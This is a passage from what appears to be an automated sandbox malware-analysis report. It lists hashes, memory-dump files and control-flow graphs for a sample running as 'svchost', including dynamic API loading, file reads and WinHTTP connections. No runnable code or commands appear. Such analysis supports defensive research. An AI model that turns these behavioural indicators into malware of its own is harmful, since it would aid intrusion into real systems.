          • Instruction Fuzzy Hash: 64413A72204B8583EB52DB26F4407DAA7E5F7897C4F048125FB8A47BA5EF38D846CB40
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressContextCryptFreeHeapLibraryLoadProcRelease
          • String ID:
          • API String ID: 3850130045-0
          • Opcode ID: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
          • Instruction ID: 19954f6952f382fe07ad367a4b777b92ae69b62c1249c18f4d2fda55ef73c1ac
          • Opcode Fuzzy Hash: 145929a3609508ac8404060b31b796e4061ef22d857f2634ef8391897ab5f1ff
          • Instruction Fuzzy Hash: 4A413D7671178586EB61DF16E494BAA77A4F7C8B84F048126EF8D87764CF38C845CB40
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
          • Instruction ID: b14e74fb3442ca454c0f05d9baab849c330a8665264c7a09ccb05e29302e0afa
          • Opcode Fuzzy Hash: 6232d811d3cfb7e92c117290181e80137c246c2343d6329668bcc7e7c22aaeff
          • Instruction Fuzzy Hash: 67B01271B51400D1D606AB23DCC23C012F4675C350FD00410D60D8A130DB3D83EFC700

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 140001080-140001139 2 1400016ac-1400016b6 0->2 3 14000113f-14000114e ??2@YAPEAX_K@Z 0->3 6 1400016b8 2->6 7 1400016be-1400016c8 2->7 4 140001154-140001172 SysAllocString 3->4 5 140001716-140001720 call 1400183b0 3->5 10 140001174-14000117e call 1400183b0 4->10 11 14000117f-1400011a3 4->11 6->7 8 1400016d1-1400016d4 7->8 9 1400016ca 7->9 13 1400016d6-1400016e3 HeapFree 8->13 14 1400016e9-1400016ff 8->14 9->8 10->11 19 1400011a5-1400011ab 11->19 20 1400011cb-1400011cd 11->20 13->14 23 1400011b3-1400011ba 19->23 24 1400011ad SysFreeString 19->24 21 1400011d3-1400011e6 call 140001730 20->21 22 1400016a5 20->22 21->22 29 1400011ec-140001216 call 14000e0c0 21->29 22->2 25 1400011c2-1400011c5 ??3@YAXPEAX@Z 23->25 26 1400011bc ??_V@YAXPEAX@Z 23->26 24->23 25->20 26->25 32 140001236-140001263 call 14000e0c0 29->32 33 140001218 29->33 37 140001265 32->37 38 140001286-1400012e8 VariantInit * 2 SysAllocString 32->38 34 140001220-140001234 33->34 34->32 34->34 39 140001270-140001284 37->39 40 1400012f5-14000131f ??2@YAPEAX_K@Z 38->40 41 1400012ea-1400012f4 call 1400183b0 38->41 39->38 39->39 43 140001325-140001346 SysAllocString 40->43 44 14000170b-140001715 call 1400183b0 40->44 41->40 46 140001358-14000136c ??2@YAPEAX_K@Z 43->46 47 140001348-14000134b 43->47 44->5 51 140001372-140001390 SysAllocString 46->51 52 140001700-14000170a call 1400183b0 46->52 47->46 49 14000134d-140001357 call 1400183b0 47->49 49->46 55 140001392-14000139c call 1400183b0 51->55 56 14000139d-1400013fe 51->56 52->44 55->56 62 140001426-140001430 56->62 63 140001400-140001406 56->63 66 140001432-140001438 62->66 67 140001458-14000147a VariantClear * 3 62->67 64 140001408 SysFreeString 63->64 65 14000140e-140001415 63->65 64->65 68 140001417 ??_V@YAXPEAX@Z 65->68 69 14000141d-140001420 ??3@YAXPEAX@Z 65->69 70 14000143a SysFreeString 66->70 71 140001440-140001447 66->71 72 140001696 call 14000cc50 67->72 73 140001480-140001487 67->73 68->69 69->62 70->71 77 140001449 ??_V@YAXPEAX@Z 71->77 78 14000144f-140001452 ??3@YAXPEAX@Z 71->78 80 14000169b-14000169d 72->80 74 14000148d-14000149d call 140001730 73->74 75 14000169f 73->75 74->22 82 1400014a3-1400014cd call 14000e0c0 74->82 75->22 77->78 78->67 80->22 80->75 85 1400014e6-14000155a VariantInit * 3 call 140001000 82->85 86 1400014cf 82->86 90 140001561 85->90 91 14000155c-14000155f 85->91 87 1400014d0-1400014e4 86->87 87->85 87->87 92 140001564-140001575 ??2@YAPEAX_K@Z 90->92 91->92 93 14000168b-140001695 call 1400183b0 92->93 94 14000157b-140001599 SysAllocString 92->94 93->72 96 1400015a6-1400015fe 94->96 97 14000159b-1400015a5 call 1400183b0 94->97 102 140001626-14000162e 96->102 103 140001600-140001606 96->103 97->96 106 14000166b-140001689 VariantClear * 3 102->106 107 140001630-140001639 102->107 104 140001608 SysFreeString 103->104 105 14000160e-140001615 103->105 104->105 108 140001617 ??_V@YAXPEAX@Z 105->108 109 14000161d-140001620 ??3@YAXPEAX@Z 105->109 106->75 110 140001666 107->110 111 14000163b-14000163e 107->111 108->109 109->102 110->106 111->110 112 140001640-140001646 111->112 113 140001648 SysFreeString 112->113 114 14000164e-140001655 112->114 113->114 115 140001657 ??_V@YAXPEAX@Z 114->115 116 14000165d-140001660 ??3@YAXPEAX@Z 114->116 115->116 116->110
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: StringVariant$AllocClearFree$??2@??3@Init$ProcessToken$CurrentHeapInformationOpen
          • String ID:
          • API String ID: 932316019-0
          • Opcode ID: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
          • Instruction ID: 73fd58dbfa8de5e771e7542bc31443fe366ed4c037a12749888c4d0630df74ea
          • Opcode Fuzzy Hash: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
          • Instruction Fuzzy Hash: CE123F72601B8586EB26CF66E8503ED73B0FB98BC8F044115EF4A5BAA9DF79C645C340

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 417 1400065d0-140006636 419 140006a66-140006a7e 417->419 420 14000663c-140006644 417->420 421 140006a86-140006a8e 419->421 422 140006a80 SysFreeString 419->422 420->419 423 14000664a-14000665a 420->423 424 140006a96-140006a9e 421->424 425 140006a90 SysFreeString 421->425 422->421 423->419 429 140006660-140006674 423->429 427 140006aa6-140006aae 424->427 428 140006aa0 424->428 425->424 430 140006ab6-140006ac3 427->430 431 140006ab0 427->431 428->427 429->419 433 14000667a-1400066f2 call 14000e580 * 4 429->433 431->430 442 1400066f8-1400066fb 433->442 443 140006a3c-140006a47 433->443 446 140006701-140006704 442->446 447 140006a25-140006a36 HeapFree 442->447 444 140006a49-140006a58 HeapFree 443->444 445 140006a5e 443->445 444->445 445->419 446->447 448 14000670a-14000670d 446->448 447->443 448->447 449 140006713-140006730 448->449 450 140006736-140006751 449->450 451 140006ad7-140006ade 449->451 454 140006756-14000675e 450->454 452 140006af2-140006af9 451->452 453 140006ae0-140006aec HeapFree 451->453 455 140006afb-140006b07 HeapFree 452->455 456 140006b0d-140006b43 call 14000e580 * 2 452->456 453->452 457 140006766-140006773 454->457 458 140006760 SysFreeString 454->458 455->456 468 140006b45-140006b4e 456->468 469 140006b8c-140006b93 456->469 460 140006775 SysFreeString 457->460 461 14000677b-140006795 457->461 458->457 460->461 466 14000679b-1400067b0 461->466 467 140006a0e-140006a1d 461->467 466->467 474 1400067b6-1400067d5 call 14000e0c0 466->474 467->447 470 140006b51-140006b8a 468->470 471 140006b95-140006ba1 HeapFree 469->471 472 140006ba7-140006bae 469->472 470->469 470->470 471->472 475 140006bc2-140006bdb 472->475 476 140006bb0-140006bbc HeapFree 472->476 479 1400067f6-140006813 lstrcmpiW 474->479 480 1400067d7 474->480 476->475 482 140006819-14000682e 479->482 483 14000698a-1400069ad 479->483 481 1400067e0-1400067f4 480->481 481->479 481->481 482->467 486 140006834-140006856 call 14000c8c0 482->486 487 1400069b3-1400069b8 483->487 488 140006ac4-140006ad2 483->488 491 14000685c-140006892 _wtoi call 14000caf0 486->491 492 1400069bd-1400069c4 486->492 487->454 488->451 501 1400068c4-1400068dc HeapFree 491->501 502 140006894 491->502 493 1400069f4-1400069f7 492->493 494 1400069c6 492->494 493->467 498 1400069f9-140006a08 HeapFree 493->498 496 1400069d0-1400069db 494->496 499 1400069dd-1400069e9 HeapFree 496->499 500 1400069ef-1400069f2 496->500 498->467 499->500 500->493 500->496 503 1400068e0-1400068fd rand 501->503 504 1400068a0-1400068ab 502->504 505 140006911-140006914 503->505 506 1400068ff 503->506 507 1400068ad-1400068b9 HeapFree 504->507 508 1400068bf-1400068c2 504->508 510 140006916-14000691e 505->510 511 140006927-14000692f 505->511 509 140006900-140006905 506->509 507->508 508->501 508->504 509->505 512 140006907-14000690f 509->512 510->503 513 140006920-140006925 510->513 514 140006936-14000693c 511->514 512->505 512->509 513->514 514->483 515 14000693e-140006945 514->515 515->483 516 140006947 515->516 517 140006950-140006960 516->517 518 140006962 517->518 519 140006976-140006979 517->519 522 140006965-14000696a 518->522 520 140006984-140006987 519->520 521 14000697b-140006980 519->521 520->483 521->517 523 140006982 521->523 522->519 524 14000696c-140006974 522->524 523->483 524->519 524->522
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Free$Heap$AddressProcString$Allocate$LibraryLoadProcess_wtoilstrcmpirand
          • String ID:
          • API String ID: 1050574015-0
          • Opcode ID: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
          • Instruction ID: 4a3659216eab84ee89323299ad5868aa41759a22a73ed70f653af329964e58fc
          • Opcode Fuzzy Hash: 2c2506c9d29a3b2e37dadef24b2f3c2898cd3c267f0d8796ce2abf700301f374
          • Instruction Fuzzy Hash: FFF16DB2304B8186EB62DF26E9403EA63A5F78DBC4F148015EB8E67B69DF39C545C701
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _time64
          • String ID:
          • API String ID: 1670930206-0
          • Opcode ID: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
          • Instruction ID: 4b7130a5fe45b23e71bac91244d7ff03deac5bbb1559c1b7e8e26f4111e349c4
          • Opcode Fuzzy Hash: b64c341f4c6a692dff2abba7590d2114a4e5d53f968345bcd9a99b1c3848285b
          • Instruction Fuzzy Hash: 50126FB2600B8185FB63DF66E8503ED27A4F748BC8F444426EB4A976B6DF39CA45C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _wtoi$FreeHeap_time64
          • String ID:
          • API String ID: 3473528173-0
          • Opcode ID: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
          • Instruction ID: 3e492c6d30ee683ac932d30f26eaa9c73d21aea8094979f73a7135df6a82422b
          • Opcode Fuzzy Hash: 7c303aa40e4e38331dc1585e2446f19d3a19a6b9c713990f762f01dcb679d952
          • Instruction Fuzzy Hash: 2D026EB2600B8195FB62DF62E8503ED27A4F748BC8F444426EB4A976B9DF39C945C740
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: _time64
          • String ID:
          • API String ID: 1670930206-0
          • Opcode ID: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
          • Instruction ID: e20eebbb1c51daf8925e8ddc921a0e42dda1ff119c888ec2a9f7eee73c6ad8fd
          • Opcode Fuzzy Hash: b7efe617559e2eb79c2949e20eda16229f9fe8d4dbbeed2f454843320d0cd5ce
          • Instruction Fuzzy Hash: C3026EB2600B8195FB62DF63E8503ED27A4F748BC8F444426EB4A976BADF39C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1221 14000c3f0-14000c42a 1223 14000c6f5 1221->1223 1224 14000c430-14000c44e call 14000e0c0 1221->1224 1226 14000c6fc-14000c706 1223->1226 1232 14000c466-14000c47d LoadLibraryExW 1224->1232 1233 14000c450-14000c464 1224->1233 1228 14000c708-14000c712 1226->1228 1229 14000c720-14000c723 1226->1229 1236 14000c719 1228->1236 1230 14000c725-14000c732 1229->1230 1231 14000c739-14000c74b 1229->1231 1230->1231 1235 14000c483-14000c4a1 call 14000e0c0 1232->1235 1232->1236 1233->1232 1233->1233 1240 14000c4a3 1235->1240 1241 14000c4c6-14000c4dd LoadLibraryExW 1235->1241 1236->1229 1242 14000c4b0-14000c4c4 1240->1242 1241->1226 1243 14000c4e3-14000c510 call 14000e0c0 GetProcAddress 1241->1243 1242->1241 1242->1242 1243->1223 1246 14000c516-14000c543 call 14000e0c0 GetProcAddress 1243->1246 1246->1223 1249 14000c549-14000c576 call 14000e0c0 GetProcAddress 1246->1249 1249->1223 1252 14000c57c-14000c5a9 call 14000e0c0 GetProcAddress 1249->1252 1252->1223 1255 14000c5af-14000c5dc call 14000e0c0 GetProcAddress 1252->1255 1255->1223 1258 14000c5e2-14000c60f call 14000e0c0 GetProcAddress 1255->1258 1258->1223 1261 14000c615-14000c642 call 14000e0c0 GetProcAddress 1258->1261 1261->1223 1264 14000c648-14000c675 call 14000e0c0 GetProcAddress 1261->1264 1264->1223 1267 14000c677-14000c6a4 call 14000e0c0 GetProcAddress 1264->1267 1267->1223 1270 14000c6a6-14000c6d3 call 14000e0c0 GetProcAddress 1267->1270 1270->1223 1273 14000c6d5-14000c6f4 1270->1273
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: AddressProc$LibraryLoad$memset
          • String ID:
          • API String ID: 2529764867-0
          • Opcode ID: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
          • Instruction ID: 5d690c7c490bd090bdbf8754a9ee11121f4ef864398ce79e0bcd1f78a3723631
          • Opcode Fuzzy Hash: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
          • Instruction Fuzzy Hash: 2A911871615B8585EA23DB16F8603E933B0FB8C7C8F44142AA78D4B67AEF79D905CB40

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1274 140001730-140001785 1275 140001821-14000184a 1274->1275 1276 14000178b-1400017ca 1274->1276 1279 140001bd9-140001be1 1275->1279 1285 140001850-14000187e 1275->1285 1276->1279 1280 1400017d0 1276->1280 1283 140001be3 1279->1283 1284 140001bf0-140001bf8 1279->1284 1281 1400017d5-140001812 1280->1281 1289 140001814-140001820 1281->1289 1290 14000188d-1400018b5 1281->1290 1283->1284 1286 140001c07-140001c15 1284->1286 1287 140001bfa 1284->1287 1285->1279 1292 140001884-140001888 1285->1292 1287->1286 1293 140001922-14000192a 1290->1293 1294 1400018b7-1400018bf 1290->1294 1292->1281 1296 140001931-14000197a call 14000dfe0 call 14000e580 call 14000e050 * 2 1293->1296 1297 14000192c 1293->1297 1294->1293 1295 1400018c1-14000191c call 14000e580 memcpy * 2 1294->1295 1295->1293 1308 1400019ca-140001a20 call 14000e050 * 2 _time64 _localtime64 call 14000e0c0 1296->1308 1309 14000197c-140001995 call 14000e050 1296->1309 1297->1296 1322 140001a25-140001a3c 1308->1322 1314 1400019b3-1400019c7 call 14000e050 1309->1314 1315 140001997 1309->1315 1314->1308 1317 1400019a0-1400019b1 1315->1317 1317->1314 1317->1317 1323 140001a56-140001a86 wcsftime 1322->1323 1324 140001a3e 1322->1324 1325 140001aa5-140001acb call 14000e050 1323->1325 1326 140001a88 1323->1326 1327 140001a40-140001a54 1324->1327 1331 140001ae3-140001ae6 1325->1331 1332 140001acd 1325->1332 1328 140001a90-140001aa3 1326->1328 1327->1323 1327->1327 1328->1325 1328->1328 1334 140001b37-140001b61 call 14000e050 call 14000bd60 1331->1334 1335 140001ae8-140001b01 call 14000e050 1331->1335 1333 140001ad0-140001ae1 1332->1333 1333->1331 1333->1333 1346 140001b83-140001bd1 call 14000e050 HeapFree * 2 1334->1346 1347 140001b63 1334->1347 1341 140001b23-140001b33 call 14000e050 1335->1341 1342 140001b03 1335->1342 1341->1334 1344 140001b10-140001b21 1342->1344 1344->1341 1344->1344 1346->1279 1349 140001b70-140001b81 1347->1349 1349->1346 1349->1349
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: FreeHeapmemcpy$AddressLibraryLoadProc_localtime64_time64wcsftime
          • String ID: <
          • API String ID: 2118791860-4251816714
          • Opcode ID: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
          • Instruction ID: 7b3512f6305f96da40dd492177f831db69bdef71e394fa92b440c6adabb0c7d5
          • Opcode Fuzzy Hash: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
          • Instruction Fuzzy Hash: 3ED15176600B8586EB21DF26E4503EE73A0FB89BC8F544125EF8A47B69EF39C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1411 14000a3d0-14000a423 1413 14000a425-14000a435 HeapFree 1411->1413 1414 14000a439-14000a45a call 14000e0c0 1411->1414 1413->1414 1417 14000a476-14000a4c6 CreateFileW 1414->1417 1418 14000a45c 1414->1418 1420 14000a586-14000a59d 1417->1420 1421 14000a4cc-14000a50c SetFilePointer * 2 1417->1421 1419 14000a460-14000a474 1418->1419 1419->1417 1419->1419 1424 14000a5a3-14000a5b9 call 14000bd60 1420->1424 1425 14000a6a5 1420->1425 1422 14000a514-14000a524 call 14000e580 1421->1422 1423 14000a50e-14000a512 1421->1423 1426 14000a576-14000a57d 1422->1426 1436 14000a526-14000a54e ReadFile 1422->1436 1423->1426 1434 14000a5eb-14000a608 call 14000e580 1424->1434 1435 14000a5bb-14000a5c3 1424->1435 1428 14000a6aa-14000a6ad 1425->1428 1426->1420 1431 14000a6c4-14000a6dd 1428->1431 1432 14000a6af-14000a6be HeapFree 1428->1432 1432->1431 1446 14000a8de-14000a8e1 1434->1446 1447 14000a60e-14000a63c 1434->1447 1437 14000a5c5-14000a5cb 1435->1437 1438 14000a5cd-14000a5d0 1435->1438 1440 14000a558-14000a570 HeapFree 1436->1440 1441 14000a550-14000a556 1436->1441 1437->1437 1437->1438 1438->1434 1442 14000a5d2-14000a5d4 1438->1442 1440->1426 1441->1426 1444 14000a663-14000a666 1442->1444 1445 14000a5da-14000a5e2 1442->1445 1444->1434 1448 14000a668-14000a698 call 14000ce20 1444->1448 1449 14000a5e4 1445->1449 1450 14000a5e6-14000a5e9 1445->1450 1446->1428 1453 14000a642-14000a65e call 14000e580 1447->1453 1454 14000a6de-14000a6e9 call 14000e580 1447->1454 1448->1434 1462 14000a69e 1448->1462 1449->1450 1450->1434 1450->1442 1461 14000a6ef-14000a718 call 14000cbd0 call 14000e0c0 1453->1461 1454->1446 1454->1461 1468 14000a736-14000a76c call 140002880 1461->1468 1469 14000a71a 1461->1469 1462->1425 1473 14000a772-14000a775 1468->1473 1474 14000a8c4-14000a8c7 1468->1474 1470 14000a720-14000a734 1469->1470 1470->1468 1470->1470 1476 14000a7c5 1473->1476 1477 14000a777-14000a785 1473->1477 1474->1446 1475 14000a8c9-14000a8d8 HeapFree 1474->1475 1475->1446 1478 14000a7ca-14000a7d3 1476->1478 1477->1476 1479 14000a787-14000a792 1477->1479 1478->1474 1480 14000a7d9-14000a7de 1478->1480 1481 14000a7a2-14000a7a7 1479->1481 1482 14000a794-14000a797 1479->1482 1484 14000a7e4-14000a7f4 rand 1480->1484 1483 14000a7ae-14000a7b0 1481->1483 1485 14000a7b4-14000a7b7 1482->1485 1486 14000a799-14000a7a0 1482->1486 1483->1480 1487 14000a7b2 1483->1487 1489 14000a7f6-14000a7fd 1484->1489 1490 14000a800-14000a81d 1484->1490 1485->1481 1488 14000a7b9-14000a7c3 1485->1488 1486->1481 1486->1482 1487->1478 1488->1483 1489->1490 1491 14000a82b-14000a838 1490->1491 1492 14000a81f-14000a824 1490->1492 1491->1484 1493 14000a83a-14000a85f call 14000e580 1491->1493 1492->1491 1493->1446 1496 14000a861-14000a882 call 14000e0c0 1493->1496 1499 14000a884 1496->1499 1500 14000a8a6-14000a8bf call 14000cd70 1496->1500 1501 14000a890-14000a8a4 1499->1501 1500->1425 1501->1500 1501->1501
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670101099.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_140000000_svchost.jbxd
          Yara matches
          Similarity
          • API ID: Heap$AddressFileFreeProc$Pointer$AllocateCreateLibraryLoadProcessReadrand
          • String ID:
          • API String ID: 2430904750-0
          • Opcode ID: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
          • Instruction ID: 44fc61901c645cc289ec697281c9d597236c5fc786e5eaf41bf353a4e8eb591f
          • Opcode Fuzzy Hash: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
          • Instruction Fuzzy Hash: E2D161B2211B8585EB62DF26E8503EA37E4F749BC8F448015EF894B7A9DF39C945C740

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1504 14000dc30-14000dca9 call 14000d420 GetTickCount 1507 14000decd-14000df01 call 14000e0c0 call 14000e580 1504->1507 1508 14000dcaf-14000dcbe 1504->1508 1521 14000df03 1507->1521 1522 14000df25 1507->1522 1510 14000dcc0-14000dcc3 1508->1510 1512 14000deb9-14000decb 1510->1512 1513 14000dcc9-14000dcfc call 14000e0c0 1510->1513 1512->1507 1514 14000df29-14000df59 1512->1514 1523 14000dd16-14000dd22 1513->1523 1524 14000dcfe-14000dcff 1513->1524 1519 14000df61-14000df69 1514->1519 1520 14000df5b WinHttpCloseHandle 1514->1520 1525 14000df74-14000df7c 1519->1525 1526 14000df6b-14000df6e WinHttpCloseHandle 1519->1526 1520->1519 1527 14000df10-14000df23 1521->1527 1522->1514 1529 14000dd24-14000dd27 WinHttpCloseHandle 1523->1529 1530 14000dd2d-14000dd50 WinHttpConnect 1523->1530 1528 14000dd00-14000dd14 1524->1528 1531 14000df84-14000df8c 1525->1531 1532 14000df7e WinHttpCloseHandle 1525->1532 1526->1525 1527->1522 1527->1527 1528->1523 1528->1528 1529->1530 1535 14000dd56-14000dd75 call 14000caf0 1530->1535 1536 14000deb0-14000deb3 1530->1536 1533 14000df8e-14000df9a HeapFree 1531->1533 1534 14000dfa0-14000dfda 1531->1534 1532->1531 1533->1534 1540 14000dd77-14000dd7b 1535->1540 1541 14000dd7d-14000dda7 call 14000e0c0 1535->1541 1536->1510 1536->1512 1542 14000ddca-14000ddda call 14000d630 1540->1542 1547 14000ddc6 1541->1547 1548 14000dda9 1541->1548 1549 14000dddf-14000dde1 1542->1549 1547->1542 1550 14000ddb0-14000ddc4 1548->1550 1549->1536 1551 14000dde7-14000ddf1 1549->1551 1550->1547 1550->1550 1551->1536 1552 14000ddf7-14000ddfc 1551->1552 1553 14000de11-14000de2b call 14000d9e0 1552->1553 1554 14000ddfe-14000de0c 1552->1554 1553->1536 1557 14000de31-14000de3c 1553->1557 1554->1536 1557->1536 1558 14000de3e-14000de4c 1557->1558 1559 14000de4e 1558->1559 1560 14000de6f-14000de89 call 14000bf10 1558->1560 1561 14000de50-14000de56 1559->1561 1567 14000de8b-14000de9a HeapFree 1560->1567 1568 14000dea0-14000dea8 1560->1568 1563 14000de58-14000de5b 1561->1563 1564 14000de5d-14000de66 1561->1564 1563->1564 1566 14000de68 1563->1566 1564->1561 1564->1566 1566->1560 1567->1568 1568->1536 1569 14000deaa-14000dead 1568->1569 1569->1536
          APIs
          Memory Dump Source
          • Source File: 00000008.00000002.2670032562.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
          • Associated: 00000008.00000002.2670006751.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670055662.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
          • Associated: 00000008.00000002.2670071798.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
